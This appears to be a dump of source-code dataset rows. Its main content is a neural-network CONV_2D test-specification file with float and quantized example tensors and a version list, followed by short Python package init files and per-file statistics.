o7: [-1.27853, 1.74987, -0.876718, 0.989692, 0.298548, 0.522103, -0.536896, -0.179382, -0.966914, 1.33708, 1.37042, -0.495494, 1.43859, -1.548, -0.430026, -0.662793, -0.0867897, -0.900658, -0.524396, 0.255731, -0.779081, 0.12666, 0.915651, -0.444765, -0.186842, -1.87308, 1.21135, -0.385009, 1.72032, -1.56036, -1.23059, 1.23694, 0.00200015, 0.359522, 1.60084, 0.434006, -0.282945, 2.37292, -1.28653, 0.0847837, -0.352093, -2.39659, 0.149246, 0.920351, -1.34346, 0.952311, -0.35811, 0.403449, 0.484796, -1.19989, -0.684298, -1.41301, 0.103177, -0.307039, 1.17741, 2.58936, -2.76237, -1.21565, -1.09619, 1.17432, 0.512143, 0.771379, 0.399879, -0.0533093, 0.290864, 0.95563, 1.16328, 1.80768, -1.52564, -0.126476, -0.185224, -0.114779, 1.2248, 0.237127, -0.213297, -0.619941, 0.497944, -1.68688, 1.59314, -0.127337, 0.111419, 1.13719, 1.68537, -0.479644, 1.18608, -2.52744, 1.34136, 0.548297, -2.0838, 2.64585, -0.993354, 0.128238, 1.26092, 0.318668, 0.893795, -0.0600559, -0.629126, -0.949229, 2.25828, -1.961, 0.00589599, -0.187854, -1.02403, 0.396121, 1.3704, 3.99355, 0.434221, 0.274464, -0.562438, -0.914871, 0.539129, -0.928687, 0.834954, 0.844178, -0.566053, -0.957341, 0.933336, 1.13613, -1.22109, 1.4649, -0.414666, -0.452821, -0.706006, -1.72657, -0.726574, -0.0979362, -0.478669, 1.78703, -0.639288, 1.48565, -0.179904, 1.01003, -0.317118, -0.675387, 1.90969, -1.38343, 0.697255, -0.292255, 1.81634, 0.717801, 0.862479, -0.407478, -0.343106, -0.0353232, -0.481893, -0.135565, -2.95941, 0.247846, 2.67757, -2.23999, -0.519673, 0.254447, 0.415283, -1.01065, 0.507911, 0.979926, -0.184304, -0.000950437, -0.734348, -0.196685, -0.713241, 0.594972, 0.0845042, 2.48496, 0.385019, -0.201145, 0.533332, -0.904872, -0.333518, -0.581063, -2.07065, 0.118687, -1.86708, -0.601987, 0.432037, 1.73923, 0.590007, 0.419788, 0.314198, 2.12817, 0.570793, -1.15998, -0.348587, -1.10231, -2.13091, 0.134467, -0.460382, 0.138338, 3.455, 0.679068, -0.190282, -0.0307461]
}, {
i7: [-0.295335, -0.00387601, -0.552251, 0.166084, -0.28482, -0.152143, -0.719885, -0.869386, -0.745598, 0.823947, 0.473183, -0.331337, 0.187631, 0.0426571, -0.826897, -0.755085, -0.472453, -0.0233656, 0.0483436, 0.933418, -0.961974, 0.0125783, 0.219742, 0.342604, -0.15166, 0.0934905, 0.783221, 0.129664, 0.838844, -0.271388, 0.924519, 0.342843, 0.274418, 0.350817, 0.841638, -0.543993, -0.00283395, -0.128467, -0.682943, -0.319117, 0.84634, 0.283003, 0.32865, 0.0293755, -0.0335696, 0.591266, -0.0743476, -0.741271, 0.462056, -0.583625, -0.590183, 0.6234, 0.535269, -0.670818, -0.955642, -0.770173, 0.479986, 0.664377, 0.399445, -0.968874, -0.276263, -0.901951, 0.544104, -0.958981, 0.482658, -0.807284, 0.305369, -0.947818, 0.827498, -0.382887, -0.805741, -0.796678, -0.299804, -0.229828, 0.818783, -0.103055, -0.45568, -0.227827, 0.543743, -0.96073, 0.946747, -0.857182, -0.96426, -0.292411, -0.715614, 0.765278, -0.475043, -0.590142, -0.238507, 0.673002, -0.473357, -0.319626, 0.936014, 0.486607, 0.580844, 0.425352, -0.800994, 0.290763, -0.494953, -0.441162, 0.718677, -0.828427, 0.96965, 7.53637e-05, -0.699973, -0.526886, -0.352682, 0.799466, 0.332789, 0.723389, 0.407659, -0.934084, -0.284705, 0.961484, -0.700395, -0.985808, -0.595342, -0.691721, 0.49448, -0.0842649, 0.0390966, 0.298938, -0.128094, -0.97158, 0.86393, 0.270606, -0.468986, -0.256605, 0.47215, -0.273117, -0.590343, -0.826529, -0.725381, -0.194821, -0.259661, -0.0949207, -0.180302, 0.0446834, -0.222133, -0.40393, 0.295772, -0.92949, 0.580079, -0.169856, 0.330311, 0.0173551, -0.635823, 0.475942, 0.907175, 0.242777, -0.512208, 0.362463, 0.0496289, 0.65171, 0.990057, 0.690733, -0.469013, -0.101311, -0.68372, -0.157841, -0.677711, -0.708224, -0.659437, -0.407607, 0.677033, 0.89032, 0.228307, -0.749514, 0.772958, 0.054701, 0.551705, 0.917052, -0.895022, -0.702397, 0.484142, 0.108648, 0.833347, 0.478872, -0.984112, 0.387176, -0.73299, 0.7526, 0.443312, -0.0987856, 0.125415, 0.10876, -0.498108, 0.43209, 0.344609, 0.928941, -0.130732, -0.0569167],
o7: [0.78574, 0.0700466, -0.110245, 0.0141003, -0.621007, -0.979104, 1.24104, 0.580398, -0.512997, 0.900559, -0.683229, -1.0162, 1.0089, -0.0752488, 0.110969, 0.270558, 0.756819, -0.10753, -0.371484, 0.149005, 0.0973829, 0.155766, -0.476502, 0.259481, 1.06709, -1.16534, 1.52694, -0.797245, 0.802736, -0.997109, 2.2661, -1.45548, 2.15506, -1.33682, 1.15225, -3.09324, 0.943457, 0.885211, 0.987944, -0.345875, -0.114708, 1.7107, 0.104745, 0.828324, -2.49964, -0.453742, -0.288829, -0.0948694, -0.489415, 1.74889, -0.378257, -2.10237, 0.613022, -2.5225, -0.746785, 3.63816, -1.9287, 0.774279, -0.613917, -0.650011, 1.03753, -0.177923, 0.891815, -1.00373, 1.83859, -1.59239, -0.0662623, 0.218806, -1.088, 0.280837, 0.902901, -1.90127, 3.04734, -1.57302, 1.10881, -0.980369, -3.85305, -0.955859, 1.64909, 2.33573, 0.31144, -0.594375, 0.325747, -0.952566, -0.613449, 2.85073, 1.94692, 1.12977, 1.1351, -0.449652, 0.118765, -0.199547, 2.873, 1.35182, -1.85457, 1.22364, 1.38049, 2.38342, 0.882321, 1.03795, -0.321571, -2.60202, -1.6372, 1.09302, 0.461768, 1.8485, -0.158928, 4.28871, -0.437375, -1.5794, 1.59869, 0.0811864, 0.912054, 0.452176, 2.01812, 2.62907, 1.50304, -0.840276, -0.455854, -0.224913, 0.609824, -0.11105, 3.35635, 2.02386, 1.4687, -0.708365, -0.508992, -3.02602, -0.75725, 1.85277, 2.92817, -0.172997, -1.13279, -0.355636, -0.337669, -0.588752, 2.05759, 1.0651, 0.884758, -0.0712112, 3.81319, 0.771629, 0.949634, 0.0838967, -2.19264, 0.114521, 0.543556, -1.63197, -0.267442, 1.15701, -2.37862, 2.57646, 0.531208, 0.9499, -0.231441, 1.51461, 1.58888, 0.895931, -0.753084, 0.545251, 0.746903, 0.012994, -0.790398, -1.1055, 1.77789, 0.430923, 0.818241, -0.731412, 0.979546, -2.48707, -1.53658, -1.66798, -1.04585, -0.667911, 1.00299, -2.20339, 0.137826, -2.31281, 0.755535, 0.495396, 0.549629, 0.713128, 0.751369, 0.283996, -0.814532, 1.4866, 1.12105, 0.927998, 0.517938, -0.612661, -1.47756, -1.42422]
}, model=model_3_same).AddNchw(i7, o7, layout).AddVariations("relaxed", "float16")
example = Example({
i7: [-0.869931, 0.644628, -0.918393, 0.153672, 0.868562, -0.358177, -0.134931, -0.247565, 0.22174, -0.259157, -0.284296, -0.538065, 0.765559, 0.41986, -0.556241, 0.658494, 0.214355, -0.850169, -0.252893, -0.478935, 0.530526, -0.0700663, -0.988729, -0.303061, 0.150845, 0.829915, 0.476349, 0.406537, -0.355343, 0.757145, -0.356362, 0.800482, -0.713861, 0.210483, -0.634303, 0.718236, -0.752038, 0.457547, -0.550769, -0.551178, 0.446766, -0.227462, 0.216348, -0.852806, -0.351486, 0.55906, -0.668493, -0.303493, -0.363763, -0.162837, 0.0701012, 0.756097, -0.142269, 0.329724, -0.656317, -0.998086, -0.652949, -0.40316, -0.893682, 0.432744, 0.612362, -0.869588, -0.71327, -0.398092, -0.0423559, 0.436576, -0.925272, 0.176549, 0.822904, 0.096833, -0.296802, -0.427195, 0.031654, -0.254479, 0.244905, 0.0948254, 0.643769, -0.90391, 0.352665, -0.901179, 0.266159, -0.968068, -0.615401, -0.388975, 0.939052, -0.116289, 0.107523, -0.0582711, 0.435172, 0.334675, 0.459711, 0.717436, 0.496627, -0.680175, -0.415066, 0.339848, 0.506004, -0.337808, -0.107218, -0.172496, 0.870638, 0.931872, -0.953884, 0.903042, 0.760078, 0.209727, -0.285384, -0.45514, 0.113194, 0.0756611, 0.0924435, -0.472863, 0.960609, -0.160385, -0.839445, 0.457097, 0.163348, 0.344867, -0.131619, 0.688715, -0.540827, 0.571259, -0.95587, 0.506164, -0.155839, 0.0789621, 0.756772, -0.662069, 0.242908, 0.460821, 0.177872, -0.289839, -0.640603, 0.702598, -0.506406, -0.568262, -0.0713716, 0.413792, 0.159673, -0.305208, 0.133816, -0.160254, 0.787323, -0.753244, 0.600721, 0.263186, -0.162387, 0.477962, -0.702951, -0.731036, -0.939481, -0.524519, 0.934072, -0.511637, -0.503499, 0.106236, -0.323684, 0.534444, -0.843745, 0.364171, 0.0370358, -0.168801, -0.404559, -0.814178, 0.91745, -0.334276, 0.66925, -0.801201, 0.156511, -0.427949, 0.379153, 0.818597, -0.649902, 0.427087, -0.586015, -0.559789, -0.833923, 0.0892409, -0.621251, 0.213826, 0.465509, 0.4704, 0.380261, 0.413067, 0.180822, 0.172866, 0.59614, 0.825575, 0.662916, -0.704381, -0.297631, 0.697778],
o8: [-0.186842, -1.87308, 1.21135, -0.385009, 1.72032, -1.56036, -1.23059, 1.23694, 0.00200015, 0.359522, 1.60084, 0.434006, -0.282945, 2.37292, -1.28653, 0.0847837, -0.352093, -2.39659, 0.149246, 0.920351, -1.34346, 0.484796, -1.19989, -0.684298, -1.41301, 0.103177, -0.307039, 1.17741, 2.58936, -2.76237, -1.21565, -1.09619, 1.17432, 0.512143, 0.771379, 0.399879, -0.0533093, 0.290864, 0.95563, 1.16328, 1.80768, -1.52564, 1.2248, 0.237127, -0.213297, -0.619941, 0.497944, -1.68688, 1.59314, -0.127337, 0.111419, 1.13719, 1.68537, -0.479644, 1.18608, -2.52744, 1.34136, 0.548297, -2.0838, 2.64585, -0.993354, 0.128238, 1.26092, -0.629126, -0.949229, 2.25828, -1.961, 0.00589599, -0.187854, -1.02403, 0.396121, 1.3704, 3.99355, 0.434221, 0.274464, -0.562438, -0.914871, 0.539129, -0.928687, 0.834954, 0.844178, -0.566053, -0.957341, 0.933336, -0.414666, -0.452821, -0.706006, -1.72657, -0.726574, -0.0979362, -0.478669, 1.78703, -0.639288, 1.48565, -0.179904, 1.01003, -0.317118, -0.675387, 1.90969, -1.38343, 0.697255, -0.292255, 1.81634, 0.717801, 0.862479, -0.481893, -0.135565, -2.95941, 0.247846, 2.67757, -2.23999, -0.519673, 0.254447, 0.415283, -1.01065, 0.507911, 0.979926, -0.184304, -0.000950437, -0.734348, -0.196685, -0.713241, 0.594972, 0.0845044, 2.48496, 0.385019]
}, {
i7: [-0.295335, -0.00387601, -0.552251, 0.166084, -0.28482, -0.152143, -0.719885, -0.869386, -0.745598, 0.823947, 0.473183, -0.331337, 0.187631, 0.0426571, -0.826897, -0.755085, -0.472453, -0.0233656, 0.0483436, 0.933418, -0.961974, 0.0125783, 0.219742, 0.342604, -0.15166, 0.0934905, 0.783221, 0.129664, 0.838844, -0.271388, 0.924519, 0.342843, 0.274418, 0.350817, 0.841638, -0.543993, -0.00283395, -0.128467, -0.682943, -0.319117, 0.84634, 0.283003, 0.32865, 0.0293755, -0.0335696, 0.591266, -0.0743476, -0.741271, 0.462056, -0.583625, -0.590183, 0.6234, 0.535269, -0.670818, -0.955642, -0.770173, 0.479986, 0.664377, 0.399445, -0.968874, -0.276263, -0.901951, 0.544104, -0.958981, 0.482658, -0.807284, 0.305369, -0.947818, 0.827498, -0.382887, -0.805741, -0.796678, -0.299804, -0.229828, 0.818783, -0.103055, -0.45568, -0.227827, 0.543743, -0.96073, 0.946747, -0.857182, -0.96426, -0.292411, -0.715614, 0.765278, -0.475043, -0.590142, -0.238507, 0.673002, -0.473357, -0.319626, 0.936014, 0.486607, 0.580844, 0.425352, -0.800994, 0.290763, -0.494953, -0.441162, 0.718677, -0.828427, 0.96965, 7.53637e-05, -0.699973, -0.526886, -0.352682, 0.799466, 0.332789, 0.723389, 0.407659, -0.934084, -0.284705, 0.961484, -0.700395, -0.985808, -0.595342, -0.691721, 0.49448, -0.0842649, 0.0390966, 0.298938, -0.128094, -0.97158, 0.86393, 0.270606, -0.468986, -0.256605, 0.47215, -0.273117, -0.590343, -0.826529, -0.725381, -0.194821, -0.259661, -0.0949207, -0.180302, 0.0446834, -0.222133, -0.40393, 0.295772, -0.92949, 0.580079, -0.169856, 0.330311, 0.0173551, -0.635823, 0.475942, 0.907175, 0.242777, -0.512208, 0.362463, 0.0496289, 0.65171, 0.990057, 0.690733, -0.469013, -0.101311, -0.68372, -0.157841, -0.677711, -0.708224, -0.659437, -0.407607, 0.677033, 0.89032, 0.228307, -0.749514, 0.772958, 0.054701, 0.551705, 0.917052, -0.895022, -0.702397, 0.484142, 0.108648, 0.833347, 0.478872, -0.984112, 0.387176, -0.73299, 0.7526, 0.443312, -0.0987856, 0.125415, 0.10876, -0.498108, 0.43209, 0.344609, 0.928941, -0.130732, -0.0569167],
o8: [1.06709, -1.16534, 1.52694, -0.797245, 0.802736, -0.997109, 2.2661, -1.45548, 2.15506, -1.33682, 1.15225, -3.09324, 0.943457, 0.885211, 0.987944, -0.345875, -0.114708, 1.7107, 0.104745, 0.828324, -2.49964, -0.489415, 1.74889, -0.378257, -2.10237, 0.613022, -2.5225, -0.746785, 3.63816, -1.9287, 0.774279, -0.613917, -0.650011, 1.03753, -0.177923, 0.891815, -1.00373, 1.83859, -1.59239, -0.0662623, 0.218806, -1.088, 3.04734, -1.57302, 1.10881, -0.980369, -3.85305, -0.955859, 1.64909, 2.33573, 0.31144, -0.594375, 0.325747, -0.952566, -0.613449, 2.85073, 1.94692, 1.12977, 1.1351, -0.449652, 0.118765, -0.199547, 2.873, 1.38049, 2.38342, 0.882321, 1.03795, -0.321571, -2.60202, -1.6372, 1.09302, 0.461768, 1.8485, -0.158928, 4.28871, -0.437375, -1.5794, 1.59869, 0.0811864, 0.912054, 0.452176, 2.01812, 2.62907, 1.50304, 0.609824, -0.11105, 3.35635, 2.02386, 1.4687, -0.708365, -0.508992, -3.02602, -0.75725, 1.85277, 2.92817, -0.172997, -1.13279, -0.355636, -0.337669, -0.588752, 2.05759, 1.0651, 0.884758, -0.0712112, 3.81319, -2.19264, 0.114521, 0.543556, -1.63197, -0.267442, 1.15701, -2.37862, 2.57646, 0.531208, 0.9499, -0.231441, 1.51461, 1.58888, 0.895931, -0.753084, 0.545251, 0.746904, 0.0129939, -0.790398, -1.1055, 1.77789]
}, model=model_3_valid).AddNchw(i7, o8, layout).AddVariations("relaxed", "float16")
# TEST 9: quantized with scale product greater than output scale
scale = 256.5 / 255
zero_point = 128
i9 = Input("op1", ("TENSOR_QUANT8_ASYMM", [2, 2, 4, 1], scale, zero_point))
f9 = Parameter("op2", ("TENSOR_QUANT8_ASYMM", [3, 2, 2, 1], scale, zero_point),
[129, 130, 131, 132, 127, 129, 127, 129, 127, 127, 129, 129])
b9 = Parameter("op3", ("TENSOR_INT32", [3], scale * scale, 0), [1, 2, 3])
o9 = Output("op4", ("TENSOR_QUANT8_ASYMM", [2, 1, 2, 3], 1.0, 127))
model9 = Model("quant_output_multiplier_gt_1").Operation("CONV_2D", i9, f9, b9, 2, 2, 2, 0).To(o9)
# Instantiate an example
example = Example({
i9: [
129, 129, 129, 129, 130, 130, 130, 130, 129, 130, 131, 132, 129, 130,
131, 132
],
o9: [145, 129, 132, 145, 129, 132, 144, 131, 130, 164, 131, 130]
}, model=model9).AddVariations("relaxed")
# TEST 10: zero-sized input, explicit padding
# Use BOX_WITH_NMS_LIMIT op to generate a zero-sized internal tensor for box cooridnates.
p1 = Parameter("scores", "TENSOR_FLOAT32", "{1, 2}", [0.90, 0.10]) # scores
p2 = Parameter("roi", "TENSOR_FLOAT32", "{1, 8}", [1, 1, 10, 10, 0, 0, 10, 10]) # roi
o1 = Output("scoresOut", "TENSOR_FLOAT32", "{0}") # scores out
o2 = Output("classesOut", "TENSOR_INT32", "{0}") # classes out
tmp1 = Internal("roiOut", "TENSOR_FLOAT32", "{0, 4}") # roi out
tmp2 = Internal("batchSplitOut", "TENSOR_INT32", "{0}") # batch split out
model = Model("zero_sized").Operation("BOX_WITH_NMS_LIMIT", p1, p2, [0], 0.3, -1, 0, 0.4, 1.0, 0.3).To(o1, tmp1, o2, tmp2)
# Use ROI_ALIGN op to convert into zero-sized feature map.
i1 = Input("in", "TENSOR_FLOAT32", "{1, 1, 1, 1}")
zero_sized = Internal("featureMap", "TENSOR_FLOAT32", "{0, 2, 2, 1}")
model = model.Operation("ROI_ALIGN", i1, tmp1, tmp2, 2, 2, 2.0, 2.0, 4, 4, layout).To(zero_sized)
# CONV_2D op with numBatches = 0.
w = Parameter("weights", "TENSOR_FLOAT32", "{2, 1, 1, 1}", [3, 4]) # weights
b = Parameter("bias", "TENSOR_FLOAT32", "{2}", [1, 2]) # bias
o3 = Output("out", "TENSOR_FLOAT32", "{0, 2, 2, 2}") # out
model = model.Operation("CONV_2D", zero_sized, w, b, 0, 0, 0, 0, 1, 1, 0, layout).To(o3)
quant8 = DataTypeConverter().Identify({
p1: ("TENSOR_QUANT8_ASYMM", 0.1, 128),
p2: ("TENSOR_QUANT16_ASYMM", 0.125, 0),
o1: ("TENSOR_QUANT8_ASYMM", 0.1, 128),
tmp1: ("TENSOR_QUANT16_ASYMM", 0.125, 0),
i1: ("TENSOR_QUANT8_ASYMM", 0.1, 128),
zero_sized: ("TENSOR_QUANT8_ASYMM", 0.1, 128),
w: ("TENSOR_QUANT8_ASYMM", 0.1, 128),
b: ("TENSOR_INT32", 0.01, 0),
o3: ("TENSOR_QUANT8_ASYMM", 0.1, 128)
})
Example({
i1: [1],
o1: [],
o2: [],
o3: [],
}).AddNchw(i1, zero_sized, o3, layout).AddVariations("relaxed", quant8, "float16")
# TEST 11: zero-sized input, implicit padding
# Use BOX_WITH_NMS_LIMIT op to generate a zero-sized internal tensor for box cooridnates.
p1 = Parameter("scores", "TENSOR_FLOAT32", "{1, 2}", [0.90, 0.10]) # scores
p2 = Parameter("roi", "TENSOR_FLOAT32", "{1, 8}", [1, 1, 10, 10, 0, 0, 10, 10]) # roi
o1 = Output("scoresOut", "TENSOR_FLOAT32", "{0}") # scores out
o2 = Output("classesOut", "TENSOR_INT32", "{0}") # classes out
tmp1 = Internal("roiOut", "TENSOR_FLOAT32", "{0, 4}") # roi out
tmp2 = Internal("batchSplitOut", "TENSOR_INT32", "{0}") # batch split out
model = Model("zero_sized").Operation("BOX_WITH_NMS_LIMIT", p1, p2, [0], 0.3, -1, 0, 0.4, 1.0, 0.3).To(o1, tmp1, o2, tmp2)
# Use ROI_ALIGN op to convert into zero-sized feature map.
i1 = Input("in", "TENSOR_FLOAT32", "{1, 1, 1, 1}")
zero_sized = Internal("featureMap", "TENSOR_FLOAT32", "{0, 2, 2, 1}")
model = model.Operation("ROI_ALIGN", i1, tmp1, tmp2, 2, 2, 2.0, 2.0, 4, 4, layout).To(zero_sized)
# CONV_2D op with numBatches = 0.
w = Parameter("weights", "TENSOR_FLOAT32", "{2, 1, 1, 1}", [3, 4]) # weights
b = Parameter("bias", "TENSOR_FLOAT32", "{2}", [1, 2]) # bias
o3 = Output("out", "TENSOR_FLOAT32", "{0, 2, 2, 2}") # out
model = model.Operation("CONV_2D", zero_sized, w, b, 1, 1, 1, 0, layout).To(o3)
quant8 = DataTypeConverter().Identify({
p1: ("TENSOR_QUANT8_ASYMM", 0.1, 128),
p2: ("TENSOR_QUANT16_ASYMM", 0.125, 0),
o1: ("TENSOR_QUANT8_ASYMM", 0.1, 128),
tmp1: ("TENSOR_QUANT16_ASYMM", 0.125, 0),
i1: ("TENSOR_QUANT8_ASYMM", 0.1, 128),
zero_sized: ("TENSOR_QUANT8_ASYMM", 0.1, 128),
w: ("TENSOR_QUANT8_ASYMM", 0.1, 128),
b: ("TENSOR_INT32", 0.01, 0),
o3: ("TENSOR_QUANT8_ASYMM", 0.1, 128)
})
Example({
i1: [1],
o1: [],
o2: [],
o3: [],
}).AddNchw(i1, zero_sized, o3, layout).AddVariations("relaxed", quant8, "float16")
# The tests below can comply with a lower version because the runtime removes
# optional arguments set to default values.
Example.SetVersion("V1_0",
"conv2d_v1_2_1_H3_W2_SAME_nhwc",
"conv2d_v1_2_1_H3_W2_SAME_nhwc_2",
"conv2d_v1_2_1_H3_W2_SAME_nhwc_all_inputs_as_internal",
"conv2d_v1_2_1_H3_W2_SAME_nhwc_all_inputs_as_internal_2",
"conv2d_v1_2_1_H3_W2_SAME_nhwc_all_tensors_as_inputs",
"conv2d_v1_2_1_H3_W2_SAME_nhwc_all_tensors_as_inputs_2",
"conv2d_v1_2_1_H3_W2_SAME_nhwc_all_tensors_as_inputs_all_inputs_as_internal",
"conv2d_v1_2_1_H3_W2_SAME_nhwc_all_tensors_as_inputs_all_inputs_as_internal_2",
"conv2d_v1_2_1_H3_W2_VALID_nhwc",
"conv2d_v1_2_1_H3_W2_VALID_nhwc_2",
"conv2d_v1_2_1_H3_W2_VALID_nhwc_all_inputs_as_internal",
"conv2d_v1_2_1_H3_W2_VALID_nhwc_all_inputs_as_internal_2",
"conv2d_v1_2_1_H3_W2_VALID_nhwc_all_tensors_as_inputs",
"conv2d_v1_2_1_H3_W2_VALID_nhwc_all_tensors_as_inputs_2",
"conv2d_v1_2_1_H3_W2_VALID_nhwc_all_tensors_as_inputs_all_inputs_as_internal",
"conv2d_v1_2_1_H3_W2_VALID_nhwc_all_tensors_as_inputs_all_inputs_as_internal_2",
"conv2d_v1_2_3_H3_W2_SAME_nhwc",
"conv2d_v1_2_3_H3_W2_SAME_nhwc_2",
"conv2d_v1_2_3_H3_W2_SAME_nhwc_all_inputs_as_internal",
"conv2d_v1_2_3_H3_W2_SAME_nhwc_all_inputs_as_internal_2",
"conv2d_v1_2_3_H3_W2_SAME_nhwc_all_tensors_as_inputs",
"conv2d_v1_2_3_H3_W2_SAME_nhwc_all_tensors_as_inputs_2",
"conv2d_v1_2_3_H3_W2_SAME_nhwc_all_tensors_as_inputs_all_inputs_as_internal",
"conv2d_v1_2_3_H3_W2_SAME_nhwc_all_tensors_as_inputs_all_inputs_as_internal_2",
"conv2d_v1_2_3_H3_W2_VALID_nhwc",
"conv2d_v1_2_3_H3_W2_VALID_nhwc_2",
"conv2d_v1_2_3_H3_W2_VALID_nhwc_all_inputs_as_internal",
"conv2d_v1_2_3_H3_W2_VALID_nhwc_all_inputs_as_internal_2",
"conv2d_v1_2_3_H3_W2_VALID_nhwc_all_tensors_as_inputs",
"conv2d_v1_2_3_H3_W2_VALID_nhwc_all_tensors_as_inputs_2",
"conv2d_v1_2_3_H3_W2_VALID_nhwc_all_tensors_as_inputs_all_inputs_as_internal",
"conv2d_v1_2_3_H3_W2_VALID_nhwc_all_tensors_as_inputs_all_inputs_as_internal_2",
"conv2d_v1_2_channel_nhwc",
"conv2d_v1_2_channel_nhwc_all_inputs_as_internal",
"conv2d_v1_2_channel_nhwc_all_tensors_as_inputs",
"conv2d_v1_2_channel_nhwc_all_tensors_as_inputs_all_inputs_as_internal",
"conv2d_v1_2_channel_nhwc_quant8",
"conv2d_v1_2_channel_nhwc_quant8_all_inputs_as_internal",
"conv2d_v1_2_channel_nhwc_quant8_all_tensors_as_inputs",
"conv2d_v1_2_channel_nhwc_quant8_all_tensors_as_inputs_all_inputs_as_internal",
"conv2d_v1_2_large_nhwc",
"conv2d_v1_2_large_nhwc_all_inputs_as_internal",
"conv2d_v1_2_large_nhwc_all_tensors_as_inputs",
"conv2d_v1_2_large_nhwc_all_tensors_as_inputs_all_inputs_as_internal",
"conv2d_v1_2_large_nhwc_quant8",
"conv2d_v1_2_large_nhwc_quant8_all_inputs_as_internal",
"conv2d_v1_2_large_nhwc_quant8_all_tensors_as_inputs",
"conv2d_v1_2_large_nhwc_quant8_all_tensors_as_inputs_all_inputs_as_internal",
"conv2d_v1_2_nhwc",
"conv2d_v1_2_nhwc_2",
"conv2d_v1_2_nhwc_all_inputs_as_internal",
"conv2d_v1_2_nhwc_all_inputs_as_internal_2",
"conv2d_v1_2_nhwc_all_tensors_as_inputs",
"conv2d_v1_2_nhwc_all_tensors_as_inputs_2",
"conv2d_v1_2_nhwc_all_tensors_as_inputs_all_inputs_as_internal",
"conv2d_v1_2_nhwc_all_tensors_as_inputs_all_inputs_as_internal_2",
"conv2d_v1_2_nhwc_quant8",
"conv2d_v1_2_nhwc_quant8_2",
"conv2d_v1_2_nhwc_quant8_all_inputs_as_internal",
"conv2d_v1_2_nhwc_quant8_all_inputs_as_internal_2",
"conv2d_v1_2_nhwc_quant8_all_tensors_as_inputs",
"conv2d_v1_2_nhwc_quant8_all_tensors_as_inputs_2",
"conv2d_v1_2_nhwc_quant8_all_tensors_as_inputs_all_inputs_as_internal",
"conv2d_v1_2_nhwc_quant8_all_tensors_as_inputs_all_inputs_as_internal_2")
| 115.925824 | 2,030 | 0.65161 | 7,535 | 42,197 | 3.530591 | 0.16284 | 0.019246 | 0.021652 | 0.022855 | 0.863925 | 0.84716 | 0.812878 | 0.796452 | 0.780551 | 0.76653 | 0 | 0.509019 | 0.136834 | 42,197 | 363 | 2,031 | 116.245179 | 0.221371 | 0.040572 | 0 | 0.405694 | 0 | 0 | 0.147363 | 0.081932 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
598bff9e7518761be875ff65982895ff4ca82956 | 132 | py | Python | mabel/adapters/google/__init__.py | mabel-dev/mabel | 4b06e9e5ce108e8a3267e44685fd61fc9802eb0a | [
"Apache-2.0"
] | null | null | null | mabel/adapters/google/__init__.py | mabel-dev/mabel | 4b06e9e5ce108e8a3267e44685fd61fc9802eb0a | [
"Apache-2.0"
] | 287 | 2021-05-14T21:25:26.000Z | 2022-03-30T12:02:51.000Z | mabel/adapters/google/__init__.py | mabel-dev/mabel | 4b06e9e5ce108e8a3267e44685fd61fc9802eb0a | [
"Apache-2.0"
] | 1 | 2021-04-29T18:18:20.000Z | 2021-04-29T18:18:20.000Z | from .google_cloud_storage_reader import GoogleCloudStorageReader
from .google_cloud_storage_writer import GoogleCloudStorageWriter
| 44 | 65 | 0.924242 | 14 | 132 | 8.285714 | 0.642857 | 0.172414 | 0.258621 | 0.37931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 132 | 2 | 66 | 66 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
599f2b420019b6bbbb17d6d05126d789e3a5cba1 | 163 | py | Python | automlcli/models/__init__.py | altescy/automlcli | ec57ac57df5d9d9f8a7ef79bb7a96a86801f32f4 | [
"MIT"
] | 1 | 2021-02-23T23:23:41.000Z | 2021-02-23T23:23:41.000Z | automlcli/models/__init__.py | altescy/automlcli | ec57ac57df5d9d9f8a7ef79bb7a96a86801f32f4 | [
"MIT"
] | null | null | null | automlcli/models/__init__.py | altescy/automlcli | ec57ac57df5d9d9f8a7ef79bb7a96a86801f32f4 | [
"MIT"
] | null | null | null | from automlcli.models.flaml import FLAML # noqa: F401
from automlcli.models.model import Model # noqa: F401
from automlcli.models.tpot import Tpot # noqa: F401
| 40.75 | 54 | 0.779141 | 24 | 163 | 5.291667 | 0.375 | 0.307087 | 0.448819 | 0.330709 | 0.425197 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064748 | 0.147239 | 163 | 3 | 55 | 54.333333 | 0.848921 | 0.196319 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
abff9d5a5f3ee7dd5d386f2a6b3545c1b76f94d7 | 112,621 | py | Python | chi/tests/test_population_models.py | DavAug/chi | d0bde8b18305b4ebd3e0a2c92f78dcf27f8f365f | [
"BSD-3-Clause"
] | 2 | 2021-12-09T17:35:36.000Z | 2022-03-17T13:45:06.000Z | chi/tests/test_population_models.py | DavAug/chi | d0bde8b18305b4ebd3e0a2c92f78dcf27f8f365f | [
"BSD-3-Clause"
] | 30 | 2021-07-30T08:55:17.000Z | 2022-03-21T21:55:54.000Z | chi/tests/test_population_models.py | DavAug/chi | d0bde8b18305b4ebd3e0a2c92f78dcf27f8f365f | [
"BSD-3-Clause"
] | 2 | 2021-08-04T15:07:21.000Z | 2021-12-15T11:42:31.000Z | #
# This file is part of the chi repository
# (https://github.com/DavAug/chi/) which is released under the
